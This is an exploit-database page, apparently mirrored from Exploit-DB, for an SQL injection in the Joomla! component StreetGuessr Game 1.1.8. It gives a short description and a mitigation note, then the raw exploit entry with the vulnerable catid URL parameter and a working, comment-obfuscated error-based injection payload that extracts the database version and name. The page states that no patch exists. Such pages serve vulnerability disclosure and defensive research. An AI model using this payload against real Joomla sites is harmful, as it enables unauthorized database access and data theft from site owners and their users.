header-logo
Suggest Exploit
vendor:
StreetGuessr Game
by:
Ihsan Sencan
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: StreetGuessr Game
Affected Version From: 1.1.8
Affected Version To: 1.1.8
Patch Exists: NO
Related CWE: N/A
CPE: a:nordmograph:streetguessr_game:1.1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

Joomla! Component StreetGuessr Game v1.1.8 – SQL Injection

An attacker can exploit a SQL injection vulnerability in Joomla! Component StreetGuessr Game v1.1.8 by sending a malicious SQL query to the vulnerable application. This can be done by sending a specially crafted HTTP request containing a malicious SQL query to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the database, modify or delete data, execute system level commands, and even gain access to the underlying server.

Mitigation:

Developers should always use parameterized queries, also known as prepared statements, when interacting with the database. This will ensure that user-supplied input is treated as a string value instead of part of a SQL query.
Source

Exploit-DB raw data:

# # # # #
# Exploit Title: Joomla! Component StreetGuessr Game v1.1.8 - SQL Injection
# Dork: N/A
# Date: 03.08.2017
# Vendor : https://www.nordmograph.com/
# Software: https://extensions.joomla.org/extensions/extension/sports-a-games/streetguessr-game/
# Demo: https://www.streetguessr.com/en/component/streetguess/
# Version: 1.1.8
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_streetguess&view=maps&catid=[SQL]
# 0'+/*!11110procedure*/+/*!11110analyse*/+(/*!11110extractvalue*/(0x30,/*!11110concat*/(0x27,/*!11110@@version*/,0x7e,/*!11110database()*/)),0x30)--+-
# Etc..
# # # # #

Navigation

Suggest Exploit

Services By CQR